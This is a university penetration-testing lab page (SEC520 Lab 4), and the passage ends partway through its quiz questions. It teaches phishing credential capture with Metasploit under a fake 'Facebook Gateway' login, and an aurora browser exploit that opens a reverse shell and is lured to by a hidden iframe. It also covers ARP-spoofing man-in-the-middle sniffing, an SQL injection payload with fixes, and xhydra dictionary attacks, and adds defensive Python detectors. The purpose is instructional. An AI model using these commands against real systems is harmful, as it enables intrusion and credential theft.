SEC520/labs/Lab 4

24,260 bytes added, 16:05, 31 January 2018
<h1> <span class="mw-headline">Types of Attacks</span></h1>
<h2> <span class="mw-headline">Introduction</span></h2>
<br />
In the previous lab, you learned how to perform penetration testing on a vulnerable (target) server. You learned how to perform scanning and enumeration, and then ran vulnerability testing software (e.g. Metasploit) to gain access to your Windows server. <br /><br />
In this lab, students will learn <b>other methods of vulnerability testing</b> to gain access to vulnerable servers:
<br /><br />
<dl><dd><ul><li>This lab will allow students to identify and practice common types of attacks that occur on targeted computer systems.
</li></ul>
</dd></dl>
<dl><dd><ul><li>First, students will be exposed to <b>Client-side</b> attacks (usually initiated by the server's users) including <b>Malicious web-page Payloads</b>, and <b>IP Spoofing</b> (Man in the Middle) attacks.
</li></ul>
</dd></dl>
<dl><dd><ul><li>Then, students will focus on <b>Server-side</b> attacks such as <b>Server-side Injection</b>, and <b>Password</b> attacks.
</li></ul>
</dd></dl>
<br><br>
<h2> <span class="mw-headline">Objectives</span></h2>
<ol><li>Access a server by creating a webpage using the <b>&lt;iframe&gt;</b> tag to redirect a user to a <b>Metasploit exploit</b> in order to gain access to the computer system.
</li><li>Understand how <b>phishing</b> can be used to have the user inadvertently activate (trigger) HTML code that gives access to a vulnerable server via a web-browser.
</li><li>Perform <b>IP Spoofing</b> (Man in the Middle) attacks in order to obtain useful information from a connection between computers.
</li><li>Access and manipulate a database server to gain access into the targeted server.
</li><li>Use a <b>password cracking program</b> to discover and access user accounts, and possibly root access.
</li></ol>
<p><br>
</p>
<h2> <span class="mw-headline">Required Materials (Bring to All Labs)</span></h2>
<ul>
<li> <b>SATA Hard Disk</b> (in removable disk tray).
</li><li> <b>Lab Logbook (Lab6 Reference Sheet)</b> (to make notes and observations).
</li></ul>
<p><br>
</p>
<h2> <span class="mw-headline">Prerequisites</span></h2>
<ul><li> [https://scs.senecac.on.ca/%7Efac/sec520/labs/SEC520_Lab_3.html SEC520 Lab 3]
</li></ul>
<p><br>
</p>
<h2> <span class="mw-headline">Online Tools and References</span></h2>

<ul>
<li>[http://www.ehacking.net/2011/10/metasploit-tutorials-from-beginner-to.html Metasploit Framework]</li>
<li>[http://linuxmanpages.com/man1/nmap.1.php nmap]</li>
<li>[http://www.irongeek.com/i.php?page=security/arpspoof arpspoof]</li>
<li>[http://arhodes505.awardspace.us/minituts/xhydra.htm xhydra]</li>
</ul>

<p><br>
</p>
<h2> <span class="mw-headline">Course Notes</span></h2>
<ul>
<li>[http://cs.senecac.on.ca/%7Efac/sec520/slides/sec520_w7_l1.odp odp] | [http://cs.senecac.on.ca/%7Efac/sec520/slides/sec520_w7_l1.pdf pdf] | [http://cs.senecac.on.ca/%7Efac/sec520/slides/sec520_w7_l1.ppt ppt] (Slides: Types of Attacks)</li>
<li>[http://www.youtube.com/watch?v=ZUygX8TBBw0 Phishing] | [http://www.youtube.com/watch?v=PqfZM3Lxrmg Malicious Payload] | [http://www.youtube.com/watch?v=-hd7XG-b6uk IP Spoofing] | [http://www.youtube.com/watch?v=AhTfo6pWBIM Database Injection] | [http://www.youtube.com/watch?v=Iyh_w0Ix2bc Cracking Weak Passwords] (YouTube Videos)</li>
<li>[http://libcat.senecac.on.ca/vwebv/holdingsInfo?searchId=89542&amp;recCount=50&amp;recPointer=0&amp;bibId=315433 Penetration Tester's Open Source Toolkit (E-book)] (Chapters 4, 5, 6)</li>

</ul>

<p><br>
</p>
<h1> <span class="mw-headline">Performing Lab 4</span></h1>
<br>
{{Admon/caution|CAUTION!|Scanning ports and exploiting servers
requires the permission of the server owner (preferably in writing). Students
must either use their VMs, use the IFS lab (if available), or sign an agreement to use the <b>Tank</b> server when practising these computer system intrusion methods.|}}
<br>

<h2> <span class="mw-headline">Task #1: Web-browser Redirect (Phishing) Attacks</span></h2>
<br>
This section will demonstrate the vulnerability of a computer system
with one of its weakest links: <i>Humans</i>. You will be using the <b>Metasploit</b> framework to create an attack on your server that will <i>exploit</i> and <i>gain access</i> to your target machine. You will also learn how you can redirect users to this attack site to deliver the malicious payload to that targeted computer.
<br>
INSTRUCTIONS:
<br /><br />
Metasploit is a very versatile tool for penetration testing. In addition to gaining access to "targeted" computer systems by using the <b>Armitage</b> frontend, other strategies such as <i>lurking</i> to gain access (via reverse shell) by redirecting web-browser traffic are also available.
<br /><br />
In this section, we will be using the msfconsole to issue commands that carry out the exploit via the web-browser. Before we start, we should update our Metasploit Framework. To do this, we will replace the older version of Metasploit that came with our Kali Linux edition with a newer version:
<br /><br />
{{Admon/tip|Using The MSF Console|
<b>msfconsole</b> is a shell that allows penetration testers to issue commands when working with Metasploit. For example, IFS students in the degree program are expected to perform penetration testing more in the msfconsole than in Metasploit GUIs like Armitage!<br /><br />
We will be running the <b>msfconsole</b> command to access the command shell, and setup a typical phishing attack.
|}}
<br />
<ol>
<li>Login as the <b>root</b> user, and issue the command: <b>msfconsole</b> (ignore any error; the console should eventually load). If problems persist, check whether the Metasploit server is running.<br>
Next, we will generate an attack payload (code) that can be executed from an HTML file (via a form button) to gain access to the computer system. Perform the following steps to create this payload (HTML) file:
<br /></li>
<li>In the <b>msfconsole</b>, issue the following commands:
<br /><br />
<pre style="font-family:courier;">
<b>use auxiliary/server/capture/http_basic
show options
set REALM Facebook Gateway
set URIPATH /
run</b>
</pre>
</li>
<li>Note the <b>LOCAL IP ADDRESS</b>. You will be entering that address in a web-browser on your targeted Windows server.</li>
<li>Your attack server (running Metasploit) is now "lurking" until the user enters data in a Windows dialog box.</li>
</ol>
{{Admon/important|Disable Internet Explorer Enhanced Security|
In order to demonstrate this attack, we will disable Internet Explorer Enhanced Security. Perform the instructions below to disable this feature.|}}
<br>

<ol>
<li value="5">Switch to your vulnerable Windows server, make certain that you are logged in as <b>Administrator</b>.</li>
<li>Open the <b>Control Panel</b>, select <b>Add or Remove Programs</b>, then select <b>Add/Remove Windows Components</b>. Click to select <b>Internet Explorer Enhanced Security Configuration</b> and click <b>Details</b>. Uncheck the checkboxes for administrators and all other users, and then click <b>Next</b>.</li>
<li>Login into a regular user account and open a web-browser.</li>
<li>Enter the IP ADDRESS of the attack web-site. Enter a username and password when prompted by the dialog box.</li>
<li>Now, switch to your attack machine (i.e. host), and you should see a notification of the exploit. Were you able to determine the username and password?</li>
<li>Did you think it would be harder to exploit a machine in this way?</li>
<li>How popular do you think this type of human-based attack is?</li>
<li>How can you prevent this type of attack from occurring on a "hardened system"?</li>
<li>Record your findings in your lab log-book.</li>
</ol>
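<p>The capture in this task works because of how HTTP Basic authentication is built: the server answers with a <b>401</b> carrying a <b>realm</b>, the browser shows that realm text in its login dialog, and the credentials come back merely base64-encoded in an <b>Authorization</b> header. The following Python script is an added educational example (not code from this lab page or from Metasploit) that builds the challenge, parses the browser's reply the way a capture server does, and turns the same parsing into a defender's check for Basic credentials sent without TLS. The realm, the host address <code>192.0.2.10</code> and the credentials are constructed sample values.</p>

```python
"""HTTP Basic authentication exchange, as seen by the server that issues the challenge.

Added educational example; it is not code from the lab page or from Metasploit.
The realm, host address and credentials below are constructed sample values.
"""
import base64


def build_challenge(realm: str) -> bytes:
    """Build the 401 response that makes a browser pop up a login dialog.

    The realm string is the text the browser shows in that dialog, which is
    why the Task 1 capture module is configured with a trustworthy-looking
    REALM: the dialog itself is the phishing lure.
    """
    return (
        "HTTP/1.1 401 Unauthorized\r\n"
        f'WWW-Authenticate: Basic realm="{realm}"\r\n'
        "Content-Length: 0\r\n"
        "\r\n"
    ).encode()


def parse_basic_authorization(request: bytes):
    """Return (username, password) from a request's Authorization header, or None.

    Basic authentication only base64-encodes "user:password"; nothing is
    encrypted.  Whoever receives the plain-HTTP request (the server the user
    was lured to, a proxy, or a packet sniffer on the path) reads the
    credentials directly.  Only the first Authorization header is examined.
    """
    head, _, _ = request.partition(b"\r\n\r\n")
    for line in head.split(b"\r\n")[1:]:          # skip the request line
        name, _, value = line.partition(b":")
        if name.strip().lower() != b"authorization":
            continue
        scheme, _, token = value.strip().partition(b" ")
        if scheme.lower() != b"basic":
            return None
        try:
            decoded = base64.b64decode(token.strip(), validate=True)
        except ValueError:                         # malformed base64
            return None
        user, sep, password = decoded.partition(b":")
        if not sep:
            return None
        return user.decode("utf-8", "replace"), password.decode("utf-8", "replace")
    return None


def audit_request(request: bytes, over_tls: bool) -> list:
    """Defender's view: flag Basic credentials that travel without TLS.

    The same parsing a capture server performs doubles as a detection rule
    for a proxy or IDS: Basic credentials on plain HTTP are exposed to
    anyone on the path, so HTTPS is the minimum control.
    """
    findings = []
    if parse_basic_authorization(request) is not None and not over_tls:
        findings.append("cleartext Basic credentials over plain HTTP")
    return findings


# Constructed sample of what a browser sends once the user fills in the dialog.
SAMPLE_REQUEST = (
    b"GET / HTTP/1.1\r\n"
    b"Host: 192.0.2.10\r\n"            # constructed attack-server address
    b"Authorization: Basic " + base64.b64encode(b"alice:Winter2018") + b"\r\n"
    b"\r\n"
)

if __name__ == "__main__":
    print(build_challenge("Facebook Gateway").decode())
    print(parse_basic_authorization(SAMPLE_REQUEST))   # ('alice', 'Winter2018')
    print(audit_request(SAMPLE_REQUEST, over_tls=False))
```

<p>The point for the "hardened system" question: nothing in the protocol protects the credentials, so the defences are on the client and transport side (HTTPS only, browsers and proxies that flag Basic over plain HTTP, and users trained to distrust a bare IP address asking for a social-media login).</p>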
<br /><br />
{{Admon/tip|The Phishing Attack (For Interest Only)|
<br /><br /><b>WARNING! Only try this for penetration testing on your VMs or on servers that you have permission to perform penetration testing on!</b><br /><br />You have created a mechanism to gain access to a vulnerable system by using the targeted system's web-browser. All the <b>penetration tester</b> needs to do is to set an <b>elaborate "trap" to redirect the user to your host's IP_ADDRESS</b>, disguised as a regular link.<br /><br />
Here is how simple (subtle) it can be:<br /><br />
<ol>
<li>Perform a Google search to use msfconsole to setup a "reverse shell attack" by entering the console commands:<ul><li>use windows/browser/ms10_002_aurora</li><li>set generic/shell_reverse tcp</li><li>set LHOST (your attack host IP ADDRESS)</li><li>set URIPATH /</li><li>set LPORT 7371</li><li>set SRVPORT 80</li><li>exploit</li></ul></li><li>Create a "phony" Facebook notification for the "targeted" user on the system (this is where the reconnaissance (information gathering) phase comes in handy, e.g. e-mail usernames and Facebook accounts).</li>
<li>Here is a link to sample HTML code: [https://scs.senecac.on.ca/%7Efac/sec520/labs/email-attachment-template.html.txt Template of e-mail attachment]</li>
<li>Edit the file to contain the following iframe (that will draw the user to your attack website):<br><br>
<pre> <b> &lt;iframe src="ATTACK_SERVER_IP_ADDRESS" width="100" height="0"&gt; &lt;/iframe&gt;</b>
</pre></li>
<li>We could then send this HTML file via an e-mail to the user (in this case masquerading as a Facebook notification). You could simulate this attack for demonstration by creating the HTML file on your Windows server and loading this file with a web-browser (like Internet Explorer).<br /><br />Another approach would be to send a "phony" notification with links to the Facebook "login" page containing the &lt;iframe&gt; element.</li>
</ol>
|}}
<br />
<ol>
<li value="14">Proceed to Task #2</li>
</ol>
<p><b>Answer the Task #1 observations / questions in your lab log book.</b>
</p>
<br><br>
<h2> <span class="mw-headline">Task #2: IP Spoofing (Man in the Middle) Attacks / Packet Sniffing</span></h2>

<p><br>
This section will demonstrate an <b>IP Spoofing</b> attack (sometimes
referred to as <i>"arp poisoning"</i>) where the target server is "tricked"
into communicating with a server that it assumes has the correct MAC
address. The attacker can then <b>"feed packets"</b> to the destination, allowing for an uninterrupted session from which to obtain information such as usernames and passwords.
<br><br>
INSTRUCTIONS:
</p><ol>
<li>We will be using your <b>Kali Linux</b> host machine, <b>Vulnerable Windows VM</b>, and <b>Vulnerable Linux VM</b> for this section.</li>
<li>Note the IP Address of your Windows server.
</li><li>Make certain that your Windows machine is running an FTP
server. Set up the FTP server to only allow users to access the FTP
server by username and password (possibly not required from default installation and startup).</li>
<li>For demonstration purposes of this "man in the middle" attack, open a command prompt, and issue the following MS-Windows command: <b>ping LINUX_IP_ADDR -t</b><br /><br />You should now see proof of a connection between your vulnerable Windows and Linux servers.</li>
<li>Switch to your vulnerable Linux server, open a shell terminal, and note the IP Address of your vulnerable Linux server.</li>
<li>Open another shell terminal, and issue the following Linux command to continuously "ping" the Windows server: <b>ping WINDOWS_IP_ADDR</b></li>
<li>We will now trick the Windows server into thinking that the attack (Kali Linux or "host") server is the destination server.</li>
<li>Switch to your Kali Linux (host) server, and open a shell terminal.</li>
<li>While in the host (attack) machine, issue the following Linux command:<br /><br /> <b>sudo arpspoof -t &nbsp;&nbsp; WINDOWS_IP_ADDR &nbsp;&nbsp; LINUX_IP_ADDR</b><br><br> </li>
<li>We need to continue the "man in the middle" attack by now
performing the same maneuver for the Linux VM. While still in the host (attack) machine, open another shell terminal and issue the following
Linux command: <br><br><b>sudo arpspoof -t &nbsp;&nbsp; LINUX_IP_ADDR &nbsp;&nbsp; WINDOWS_IP_ADDR</b><br><br></li>
<li>Switch first to your vulnerable Windows machine to view the pings. What do you notice? Do the same for your vulnerable Linux machine. Record your findings in your lab log-book.<br /><br /></li>
</ol>

{{Admon/important|Connection Disconnected|When initially performing an
"IP Spoof", the connection between the machines is temporarily broken. In
order to re-establish a connection (via the "man in the middle") the attacker must enable <b>IP FORWARDING</b>.|}}
<br>
<ol>
<li value="12">To complete the "man in the middle" attack, you are required to enable <b>IP FORWARDING</b>. Open another shell window in your host (attack) machine, and issue the following Linux commands in your attack host:<br><br><b>sudo su</b> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; # login with admin password<br /><b> echo 1 &gt; /proc/sys/net/ipv4/ip_forward</b><br><br>(This sets IP FORWARDING to "True" or "On")<br><br></li>
<li>Switch to your vulnerable Windows and Linux machines. Is the connection (using the ping command) re-established? Record your findings in your lab log-book.<br /><br /></li>
</ol>
{{Admon/important|Obtaining Username / Password Information|One of the main
reasons for a <b>"man in the middle" attack</b> is to obtain sensitive
information such as a username and password for further exploitation. A <b>Packet Sniffer</b>
is a useful tool when performing a "man in the middle" attack. Throughout
your journey in the area of Internet Security, you will soon learn there
is an abundance of tools, many of which do the same thing (including
packet sniffers). For the remainder of this section we will use a packet sniffer tool called <b>dsniff</b>.|}}
<br>
<ol>
<li value="14">In an available shell terminal on your host (attack) server, issue the following Linux command: <b>dsniff</b><br />(<b>tip:</b> Use the command: <b>find -P . | grep dsniff</b> to locate the dsniff superuser executable)</li>
<li>This packet sniffer program will lurk until a user from the Linux VM establishes a connection with the Windows VM FTP SERVER.</li>
<li>Switch to your vulnerable Linux server, and establish an FTP connection with the Windows FTP server.</li>
</ol>
{{Admon/important|FTP Doesn't Work / Alternative Arp Poisoning Method|
Students have noticed that when using Kali Linux as a host machine for the
vulnerable Windows and Linux VMs they experience a problem when using
the <b>arpspoof</b> command. You can use the <b>ettercap</b> command as an alternative; it does
not require you to enable forwarding by hand and performs the same password sniffing as dsniff.<br><br>
To run ettercap, issue the following command:
<b>ettercap -T -M arp /// /// -i vboxnet0</b><br>
|}}

<ol>
<li value="17">Then switch back to your host (attack) server.</li>
<li>What do you notice? Is this information sufficient to logon as a Windows system user? Record your findings in your lab log-book.</li>
<li>Return to your vulnerable Linux server, and close the FTP connection with the Windows server.</li>
<li>Switch back to your attack server. What information does <b>dsniff</b> provide?</li>
<li>What steps would a security analyst implement in order to reduce the possibility of a "man in the middle" attack?</li>
<li>Record your findings/answers in your lab log-book.</li>
<li>Proceed to Task #3</li>
</ol>
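<p>The arpspoof step leaves a signature on the wire that a security analyst can look for: the attacker's MAC address starts answering for both the Windows and the Linux IP address, and an IP that was previously mapped to one MAC is suddenly mapped to another. The following Python script is an added educational example (not code from this lab page, arpspoof or dsniff) that implements both checks over ARP reply lines. The capture lines are constructed in the style of <code>tcpdump -n arp</code> output; the IP addresses and MAC addresses are made up, with <code>08:00:27:33:33:33</code> playing the attack host.</p>

```python
"""Spotting ARP poisoning (the arpspoof step of Task 2) in ARP reply traffic.

Added educational example; it is not code from the lab page, arpspoof or dsniff.
The capture lines below are constructed in the style of 'tcpdump -n arp' output;
the IP and MAC addresses are made up (08:00:27:33:33:33 plays the attacker).
"""
import re
from collections import defaultdict

ARP_REPLY = re.compile(
    r"ARP, Reply (?P<ip>\d{1,3}(?:\.\d{1,3}){3}) is-at "
    r"(?P<mac>(?:[0-9a-f]{2}:){5}[0-9a-f]{2})",
    re.IGNORECASE,
)


def detect_arp_spoofing(lines):
    """Return a list of alert strings for ARP replies that look like poisoning.

    Two signals, both of which arpspoof produces when it impersonates the
    Windows and Linux hosts to each other:
    * an IP that was announced with one MAC is later announced with another
      (the victims' ARP caches are being rewritten);
    * one MAC address claims more than one IP address (the man in the middle
      answers for both ends of the conversation).
    """
    ip_to_mac = {}
    mac_to_ips = defaultdict(set)
    alerts = []
    for line in lines:
        m = ARP_REPLY.search(line)
        if not m:                      # requests and non-ARP lines are ignored
            continue
        ip, mac = m.group("ip"), m.group("mac").lower()
        previous = ip_to_mac.get(ip)
        if previous is not None and previous != mac:
            alerts.append(f"{ip} changed from {previous} to {mac}")
        ip_to_mac[ip] = mac
        if ip not in mac_to_ips[mac]:
            mac_to_ips[mac].add(ip)
            if len(mac_to_ips[mac]) > 1:
                alerts.append(f"{mac} claims {sorted(mac_to_ips[mac])}")
    return alerts


# Constructed capture: a normal reply, then the attacker's forged replies.
SAMPLE_CAPTURE = [
    "10:00:01.000001 ARP, Request who-has 192.168.56.102 tell 192.168.56.101, length 28",
    "10:00:01.000200 ARP, Reply 192.168.56.102 is-at 08:00:27:22:22:22, length 28",
    "10:00:05.000000 ARP, Reply 192.168.56.102 is-at 08:00:27:33:33:33, length 28",
    "10:00:05.000100 ARP, Reply 192.168.56.101 is-at 08:00:27:33:33:33, length 28",
]

if __name__ == "__main__":
    for alert in detect_arp_spoofing(SAMPLE_CAPTURE):
        print("ALERT:", alert)
```

<p>This is the logic behind tools such as arpwatch and switch-side Dynamic ARP Inspection; static ARP entries for critical hosts and encrypted protocols (SFTP or FTPS instead of FTP) are the complementary controls, since the sniffer in this task only succeeds because FTP sends the password in the clear.</p>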

<p><b>Answer Task #2 observations / questions in your lab log book.</b>
</p><p><br>
</p>


<h2> <span class="mw-headline">Task #3: Database Injection Attack</span></h2>


<br>
<b>SQL injection attacks</b> basically take the form of introducing or
"injecting" malicious code via the input (form) of the SQL/MySQL
database application, in order to gain access to the backend database. There are
many different methods of injection attack. We will demonstrate a
fairly common method of injection attack which exploits a weakness in
applications in front of the MySQL server that fail to <b>sanitize</b> user input. In this case, the user inserts illegal characters (the single quote <b>'</b>) within an established web-based database form.
<br><br>
In this section, we will only <u>expose</u> the student to the concept of an injection attack. <b>You are <u>NOT</u> required to setup the MYSQL server, or run a SQL injection attack on your vulnerable machines...</b>
<br /><br />
INSTRUCTIONS:
<ol>
<li>Study the following PHP code below: </li>
</ol>
<pre> &lt;?php

// Vulnerable: the value typed into the form is used in the query without any escaping.
$user = $_POST['usr'];

// Example of an injected value that an attacker could submit in the form field:
// $user = "anything' OR x='x";

// With that value, the query the database receives becomes:
// SELECT user,password FROM users WHERE user='anything' OR x='x'
mysql_query("SELECT user,password FROM users WHERE user='$user'");

?&gt;

</pre>
<br>

<ol>
<li value="2">How could this code be incorporated with an HTML document (using a form) to perform a <b>database injection</b> attack? Record your answer in your lab log-book.</li>
<li>View the associated <b>YouTube</b> video in the resources above, and try to briefly explain why this type of attack could work. Write your explanation in your lab log-book.</li>
<li>Now, make the following editing changes to your saved database form (areas to be changed are displayed in bold, red colour):</li>
</ol>
<pre> &lt;?php

// Fixed: single quotes (and other special characters) in the form value are escaped
// before the value is placed in the query, so they cannot end the string literal.
$user = <span style="color:red;font-weight:bold">mysql_real_escape_string(</span>$_POST['usr']<span style="color:red;font-weight:bold">)</span>;

// The same injected value, "anything' OR x='x", now arrives as:
// anything\' OR x=\'x
// and the query stays a lookup of one (non-existent) user name:
// SELECT user,password FROM users WHERE user='anything\' OR x=\'x'
mysql_query("SELECT user,password FROM users WHERE user='$user'");

// Note: the mysql_* functions were removed in PHP 7; mysqli or PDO prepared
// statements are the current way to keep data separate from the SQL text.
?&gt;

</pre>
<ol>
<li value="5">Try to explain how this last editing session prevented this SQL injection attack. Record your observations/answers in your lab log-book.</li>
<li>Proceed to Task #4.</li>
</ol>
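<p>To see the three versions side by side (the string-built query from step 1, the escaping fix from step 4, and the parameterized query that modern database APIs recommend), here is an added educational example in Python; it is not the lab page's PHP code. It uses the standard-library <code>sqlite3</code> module with a constructed in-memory <code>users</code> table so it runs offline; the rows are made up, and the injected value uses the quoted form <code>'x'='x</code> of the tautology shown in the lab's snippet.</p>

```python
"""SQL injection: a query built from form input, beside two ways of stopping it.

Added educational example; it is not the lab page's PHP code.  It uses Python's
sqlite3 module with a constructed in-memory 'users' table so it runs offline; the
rows are made up and the 'password' column holds placeholder strings.
"""
import sqlite3


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (user TEXT, password TEXT)")
    conn.executemany(
        "INSERT INTO users VALUES (?, ?)",
        [("alice", "hash-a"), ("bob", "hash-b"), ("carol", "hash-c")],
    )
    return conn


def lookup_vulnerable(conn, user):
    """Like the lab's first PHP snippet: the form value is pasted into the SQL text,
    so a quote in the value ends the string literal and the rest becomes SQL."""
    sql = f"SELECT user,password FROM users WHERE user='{user}'"
    return conn.execute(sql).fetchall()


def escape_sql_string(value):
    """Quote doubling: the role mysql_real_escape_string() plays in the lab's second
    snippet (the real function also escapes NUL, newlines and backslashes and is
    charset-aware; doubling the quote is the SQL-standard form that SQLite uses)."""
    return value.replace("'", "''")


def lookup_escaped(conn, user):
    sql = f"SELECT user,password FROM users WHERE user='{escape_sql_string(user)}'"
    return conn.execute(sql).fetchall()


def lookup_parameterized(conn, user):
    """Preferred fix: a parameterized query.  The value is sent separately from
    the SQL text, so it is always data and can never be parsed as SQL."""
    return conn.execute(
        "SELECT user,password FROM users WHERE user=?", (user,)
    ).fetchall()


# The classic tautology; the lab's snippet shows the same idea with x='x.
INJECTED = "anything' OR 'x'='x"

if __name__ == "__main__":
    db = make_db()
    print("vulnerable:    ", lookup_vulnerable(db, INJECTED))      # every row leaks
    print("escaped:       ", lookup_escaped(db, INJECTED))         # []
    print("parameterized: ", lookup_parameterized(db, INJECTED))   # []
```

<p>Run it and the string-built query returns every row of the table while the other two return nothing, which is the demonstration of prevention asked for in "Completing the Lab". Escaping works only if every code path remembers to call it; a parameterized query removes that burden, which is why it is the fix to prefer.</p>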

<p><b>Answer Task #3 observations / questions in your lab log book.</b>
</p><p><br>
</p>


<h2> <span class="mw-headline">Task #4: Password Cracking Attack</span></h2>


<br>
In this section, you will learn another technique to crack passwords by
obtaining <i>usernames</i> from e-mail addresses, and then running a <i>password
cracking program</i> to hopefully gain access to an account on a vulnerable Windows server that contains a weak password. Then, after gaining access to the account, we will then use a series of techniques to gain access to the
administrator's account.
<br><br>
INSTRUCTIONS:
<ol>
<li>Go to your vulnerable Windows server, create a username called <b>weak</b> that contains a very weak password (no special characters, just words that could be contained in a dictionary).</li>
<li>How could you obtain usernames (e.g. e-mail usernames) for a targeted computer system? (Review your labs and notes from the Reconnaissance Phase.) Record your answer in your lab log-book.</li>
<li>Assume that you have obtained a username (i.e. username: <b>weak</b>) from the reconnaissance phase. We will now use a tool to gain access to that account on the targeted Windows server.<br /><br /></li>
</ol>
{{Admon/important|Cain Password Dictionary|A password cracking program requires a dictionary of common passwords. The file <b>cain.txt</b> is a popular dictionary of typical or common passwords that can be used to test for weak passwords on a server.|}}
<br>


<ol>
<li value="4">We need to download a dictionary file containing many weak password combinations to help crack a user's weak password. You can perform a web search in order to save this dictionary as a text file.<br /><br />Here is a link to various password cracking dictionaries: [http://www.skullsecurity.org/wiki/index.php/Passwords http://www.skullsecurity.org/wiki/index.php/Passwords]<br /><br />As root, download the compressed file (cain.txt.bz2) to your <b>/root</b> directory.<br /><br /></li>
<li>Decompress the file by issuing the following Linux command: <b>bunzip2 cain.txt.bz2</b><br /><br /></li>
</ol>
{{Admon/important|xhydra|xhydra is a graphical frontend of a program
that scans open ports, and attempts to crack weak account passwords
using a dictionary file of potential passwords. Of course, you
could have performed this task manually by using <b>nmap</b> to scan open ports, and used other password cracking tools (such as <b>Cain and Abel</b>), but <b>xhydra</b> performs these operations automatically.|}}
<br>

<ol>
<li value="6">To launch the xhydra application as root (unless you are already in root), issue the following Linux command: <b>sudo xhydra</b><br /><br /></li>
<li>In the initial application window (ie. <b>Target</b> tab), enter the <b>WINDOWS_IP_ADDR</b> in the <b>Target</b> textbox.</li>
<li>Under the <b>Protocol</b> list-box, select <b>ftp</b>.</li>
<li>In the <b>Output Options</b> section, check <b>Be verbose</b>, and check <b>Show Attempts</b>.</li>
<li>Move to the next screen by clicking on the <b>Passwords</b> tab.</li>
<li>In the <b>Username</b> section, type the username called <b>weak</b>.</li>
<li>In the <b>Password</b> section, click on the <b>passwords list</b> radio button, and then click on the <b>passwords list text-box</b> in order to browse to the <b>/root/cain.txt</b> dictionary (on your Kali Linux system) that contains common passwords that you downloaded and decompressed.</li>
<li>At the bottom of the screen, check <b>Try login as password</b>, and click <b>Try Empty Password</b>.</li>
<li>Click on the <b>Start</b> tab, and click on the <b>Start</b> button (at the bottom of the screen) to begin the attack.</li>
<li>This attack may take several minutes to complete.</li>
<li>Check the output from the Password Cracking Attempt. Did it list
any usernames and passwords? If so, record the information in your lab
log-book.<br><br></li>
</ol>
{{Admon/important|Gaining Root Access|Once a penetration tester has access to a system as an unprivileged user, there are methods to try to identify and gain access to an administrative account.<br /><br />
For example, on Linux systems this could involve reading the <b>/etc/passwd</b> file to list users with administrative privileges, and reading the <b>/etc/shadow</b> file to attempt to crack the root password hash (via the <b>John the Ripper</b> utility).
|}}
<br>
<ol>
<li value="17">What sort of harm can be done to this organization if the <b>root</b> account has been hacked?</li>
<li>What sort of password rules should be used to make it harder to penetrate this system?</li>
</ol>
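<p>xhydra guesses passwords online, one FTP login at a time; John the Ripper (mentioned above) works offline against a stolen hash. Both succeed for the same reason: the password is in a word list. The following Python script is an added educational example (not code from this lab page, xhydra or John the Ripper) that shows the offline case against a salted hash and then the password rules an organization can enforce so the same word list finds nothing. A salted PBKDF2-SHA256 digest stands in for a generic stored password hash (the real /etc/shadow and Windows hash formats differ); the word list, the salt and the account values are constructed.</p>

```python
"""Offline dictionary attack against a stored password hash, and the policy
check that defeats it.

Added educational example; it is not code from the lab page, xhydra or John the
Ripper.  A salted PBKDF2-SHA256 digest stands in for a generic stored password
hash (the real /etc/shadow and Windows formats differ); the word list and the
account data are constructed.
"""
import hashlib

ROUNDS = 1000   # deliberately low so the example runs fast; real stores use far more


def hash_password(password: str, salt: bytes) -> bytes:
    """What a password store keeps: a salted, iterated hash, never the password."""
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, ROUNDS)


def dictionary_attack(salt: bytes, digest: bytes, wordlist):
    """Try every word from the list against a stolen (salt, digest) pair.

    Returns (password, attempts) on success or (None, attempts).  This is what
    a cracking tool does once it holds the hash: each guess costs one hash
    computation, so slow hashes and long, non-dictionary passwords are the
    defences; the salt stops one precomputed table from covering all users.
    """
    attempts = 0
    for candidate in wordlist:
        attempts += 1
        if hash_password(candidate, salt) == digest:
            return candidate, attempts
    return None, attempts


def password_policy_violations(password: str, wordlist) -> list:
    """Rules an organization can enforce so a dictionary attack cannot succeed."""
    problems = []
    if len(password) < 12:
        problems.append("shorter than 12 characters")
    if password.lower() in {w.lower() for w in wordlist}:
        problems.append("appears in a common-password list")
    classes = (
        any(c.islower() for c in password),
        any(c.isupper() for c in password),
        any(c.isdigit() for c in password),
        any(not c.isalnum() for c in password),
    )
    if sum(classes) < 3:
        problems.append("uses fewer than three character classes")
    return problems


# Constructed word list (a real one such as cain.txt has hundreds of thousands of entries).
WORDLIST = ["123456", "password", "letmein", "qwerty", "welcome", "monkey", "dragon"]
SALT = b"constructed-salt"

if __name__ == "__main__":
    stolen = hash_password("letmein", SALT)            # the 'weak' account's hash
    print(dictionary_attack(SALT, stolen, WORDLIST))    # ('letmein', 3)
    print(password_policy_violations("letmein", WORDLIST))
    print(password_policy_violations("Tr0ub4dor&3-is-long", WORDLIST))   # []
```

<p>The same policy check, run against the organization's own word list at password-change time, is the practical answer to the question about password rules; for the online case (xhydra against FTP) the matching control is an account lockout or rate limit, which caps the number of guesses the attacker ever gets to make.</p>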
<br />
{{Admon/important|Sharpening Your Skills (hackthissite.org)|
If you are interested in practicing or "honing" your penetration skills, there is a site called [http://www.hackthissite.org/pages/index/index.php http://www.hackthissite.org] that allows students to play and practice their skills.<br /><br />
<b>WARNING:</b> You ARE <u>NOT SAFE</u> in leaving personal information on the site. The owner of this site has served jail-time for FRAUD. There is also the possibility that a member of the hacker community may be able to access your personal information and use it for their personal advantage (at your expense).
<br /><br />
You have been warned!
<br />
|}}
<br />
<ol>

<li value="19">Record your findings in your lab log-book.</li>
<li>Proceed to the "Completing the Lab".</li>
</ol>

<p><b>Answer Task #4 observations / questions in your lab log book.</b>
</p><p><br>
</p>

<h1> <span class="mw-headline"> Completing the Lab </span></h1>
<p><b>Arrange evidence for each of these items on your screen, then ask
your instructor to review them and sign off on the lab's completion:</b>
</p>
<ol>
<li>Proof of <b>Windows VM hack from Phishing / Malicious Code</b>.</li>
<li><b>Packet Sniffing</b> information from Linux to Windows FTP connection.</li>
<li>Demonstration of <b>prevention of a Data Injection Attack</b>.</li>
<li>Completed Lab 4 notes.</li>
</ol>
<p><br>
</p>
<h1> <span class="mw-headline"> Preparing for Quizzes </span></h1>

<ol>
<li>Briefly explain the purpose of a <b>Phishing</b> Attack. How can phishing relate to using <b>malicious code</b>?</li>
<li>Define the term <b>Man in the Middle</b> attack.</li>
<li>Briefly list the steps in a <b>Database Injection</b> attack.</li>
<li>How can a <b>dictionary file</b> be used to crack passwords on a targeted server?</li>
